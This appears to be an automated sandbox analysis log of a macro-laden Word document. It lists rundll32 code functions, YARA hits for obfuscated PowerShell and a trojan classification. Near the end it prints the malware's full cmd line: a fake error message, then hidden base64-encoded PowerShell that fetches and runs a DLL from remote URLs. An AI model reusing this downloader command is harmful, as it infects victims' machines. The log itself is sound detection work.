                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004CA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007EA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00262C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00273895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002702C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002742DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00268736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00267B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00274B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002763C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00269A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00264A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00262A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00277A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00275A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026F444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002662A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002648BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002680BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002660B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00261280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002688E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002712E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002726F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00261CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002720C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002696CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00278ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026F536
                    Source: DATA-480841.docOLE, VBA macro line: Private Sub Document_open()
                    Source: VBA code instrumentationOLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open
                    Source: DATA-480841.docOLE indicator, VBA macros: true
                    Source: 00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: 00000005.00000002.2107604650.00000000003D6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@26/8@7/5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00211C88 CreateToolhelp32Snapshot,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$TA-480841.docJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDA28.tmpJump to behavior
                    Source: DATA-480841.docOLE indicator, Word Document stream: true
                    Source: DATA-480841.docOLE document summary: title field not present or empty
                    Source: DATA-480841.docOLE document summary: edited time not present or 0
                    Source: C:\Windows\System32\msg.exeConsole Write: ............K........................... .Y.......Y.....................H...............#...............................h.......5kU.............
                    Source: C:\Windows\System32\msg.exeConsole Write: ............K...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........u.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j....................................}..v.....s......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j..... ..............................}..v....0t......0.................u.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....h.u.............................}..v............0.................u.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v....0.......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... ..............................}..v............0...............8.u.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............t..j....E...............................}..v.....N......0...............h.u.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+...............t..j....E...............................}..v....P.......0...............h.u.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: DATA-480841.docVirustotal: Detection: 59%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                    Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnA